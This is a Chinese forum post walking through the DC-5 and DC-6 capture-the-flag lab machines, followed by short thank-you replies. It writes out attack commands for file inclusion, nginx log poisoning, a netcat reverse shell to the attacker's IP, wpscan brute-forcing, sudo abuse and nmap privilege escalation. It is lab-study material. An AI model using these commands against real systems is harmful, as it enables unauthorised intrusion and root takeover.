吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2944|回复: 19
收起左侧

[CTF] DC5,DC6靶机详解

  [复制链接]
yunkof 发表于 2023-7-14 16:45

【DC系列05】DC-5靶机复盘

这个靶机给我带来最大的思考就是学到了nginx的配置文件可以是一个漏洞,写入一个反弹shell进入服务器。

靶机下载地址:https://www.five86.com/downloads.html

首先对靶机进行一个ip扫描。

image-20230704200000200

打开网站后点击Contact,在下面随便提交点东西。

https://s1.ax1x.com/2023/07/14/pC4RfAO.png

提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。

https://s1.ax1x.com/2023/07/14/pC4R44e.png

所以我们来扫一下这个关键目录。

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.102.143/thankyou.php?FUZZ=/etc/passwd

image-20230704200602700

image-20230704200546390

利用指纹识别可以发现这是个nginx服务器。

image-20230709154816000

尝试查看一下nginx的日志文件,发现是可以查看的,并且里面有一些登陆记录。

image-20230704195933873

用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。

image-20230704201658648

利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。

image-20230704201847331

发现成功拿到shell。

image-20230704202020317

搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。

image-20230704202010439

发现有两个可以利用的漏洞文件。

image-20230704202540801

使用python先美化一下终端,

python -c "import pty;pty.spawn('/bin/bash')"

然后我们进入/tmp目录。

把漏洞文件下载到靶机中给添加一个执行权限。

执行后发现成功拿到root权限。

image-20230704202639569

【DC系列06】DC-6靶机复盘

这个靶机我学会了whatweb指纹识别,同时学会了针对wordpress网站扫描的工具wpscan。

靶机下载地址:https://www.five86.com/downloads.html

我们打开这个靶机后首先还是先对靶机进行一个ip扫描,然后再单独对这个ip进行一个全局扫描。

扫描后ip地址是192.168.102.147。

我们再单独扫描一下

nmap -A 192.168.102.147 -p-

这个靶机有一个特点就是扫描到ip后,你需要往系统的hosts文件中添加一行解析,我的win10添加解析也打不开,我是在kali中弄的。

192.168.102.147   wordy

进来后发现是个wordprss的网站,通常wordpress搭建的网站都有一个readme.html信息网站和wp-login.php登陆页面,都省去扫描目录了。

image-20230705202834547

image-20230705202900137

也可以利用whatweb对这个网站进行一个指纹识别。

whatweb -v 192.168.102.147   指纹识别

这个靶机的说明里面给了一个密码字典,说明这个靶机是需要进行爆破的,利用wpscan可以扫描出这个网站有什么用户名。

wpscan --url http://wordy/ --enumerate u

image-20230705204513384

然后再爆破就可以出来wordpress的登陆密码了。

wpscan --url http://wordy -U user -P passwords.txt

用户: mark 密码: helpdesk01

image-20230705211006370

登陆上后并没有找到什么漏洞,但是发现上面安装了插件,所以就搜索了一下这个插件有没有漏洞。

image-20230705205242246

发现刚好有线程的漏洞,我们下载下来。

image-20230705205610553

下载打开后有一些需要修改的地方,一个是把网址改成我们的靶机地址。

其次就是反弹shell改成一下,按照我截图中的来也可以。

nc -e /bin/bash 192.168.102.129 8888

image-20230705205834402

这里我们监听一下8888端口,然后利用浏览器运行一下这个漏洞文件,是一个html文件。

file:///root/45274.html

image-20230705211701575

然后成功进入shell,进入后我们首先美化一下命令行。

python3 -c "import pty;pty.spawn('/bin/bash')"

在这个web shell的/home/mark/stuff目录下有一个things-to-do.txt文件,里面有graham的密码,su graham一下发现登陆上去了。

user: graham - GSo7isUM1D4

image-20230705212041123

登陆上后sudo -l发现可以免密用jens的身份执行/home/jens/backups.sh文件。

image-20230705212541335

往backups.sh文件中执行一个/bin/bash,当执行的时候可以返回jens的shell。

image-20230705212608937

成功返回jens的shell。

image-20230705212706560

进入jens后sudo -l发现可以以root权限执行nmap命令,搜索了一下nmap提权方法,以此执行以下命令就有了root权限。

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

image-20230705212919251

免费评分

参与人数 10威望 +1 吾爱币 +26 热心值 +10 收起 理由
笙若 + 1 + 1 谢谢@Thanks!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
zhczf + 1 我很赞同!
wasdzjh + 1 + 1 我很赞同!
allspark + 1 + 1 用心讨论,共获提升!
1MajorTom1 + 1 热心回复!
RippleSky + 1 谢谢@Thanks!
blindcat + 1 + 1 谢谢@Thanks!
SPT + 1 + 1 我很赞同!
woyucheng + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Forven47 发表于 2023-7-14 16:57
helpdesk01这个密码在rockyou里第72万行,我当时下载这个靶机的时候没注意有提供密码字典的
 楼主| yunkof 发表于 2023-7-14 16:58
Forven47 发表于 2023-7-14 16:57
helpdesk01这个密码在rockyou里第72万行,我当时下载这个靶机的时候没注意有提供密码字典的

这个字典里面有1400万个密码,太多了
RWGDRZ 发表于 2023-7-14 17:34
lele671 发表于 2023-7-14 17:36
谢谢非常谢谢
SPT 发表于 2023-7-14 17:50
学习到了
good7801 发表于 2023-7-14 17:52
大神,写的东西值得学习
blindcat 发表于 2023-7-14 18:51
向大神学习
xiwangly2 发表于 2023-7-15 09:15
get到了
lyxcool 发表于 2023-7-15 12:15
学习一下
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-18 12:31

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表